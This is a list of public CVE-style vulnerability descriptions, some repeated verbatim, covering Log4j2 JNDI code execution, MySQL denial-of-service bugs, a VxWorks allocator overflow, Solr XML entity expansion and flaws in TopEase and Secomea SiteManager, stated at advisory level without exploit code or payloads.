Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Insufficient Input Validation in Web Applications operating on Business-DNA Solutions GmbH’s TopEase® Platform Version <= 7.1.27 allows an authenticated remote attacker with Object Modification privileges to insert arbitrary HTML without code execution.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.
Improper Access Control vulnerability in web service of Secomea SiteManager allows local attacker without credentials to gather network information and configuration of the SiteManager. This issue affects: Secomea SiteManager All versions prior to 9.5 on Hardware.
An issue was discovered in Wind River VxWorks 7. The memory allocator has a possible integer overflow in calculating a memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.
An issue was discovered in Wind River VxWorks 7. The memory allocator has a possible integer overflow in calculating a memory block's size to be allocated by calloc(). As a result, the actual memory allocated is smaller than the buffer size specified by the arguments, leading to memory corruption.
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Vulnerability in the MySQL Server product of Oracle MySQL (component: InnoDB). Supported versions that are affected are 8.0.21 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
Solr versions 1.3.0 to 1.4.1, 3.1.0 to 3.6.2 and 4.0.0 to 4.10.4 are vulnerable to an XML resource consumption attack (a.k.a. Lol Bomb) via it’s update handler.?By leveraging XML DOCTYPE and ENTITY type elements, the attacker can create a pattern that will expand when the server parses the XML causing OOMs.
Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 8.0.16 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).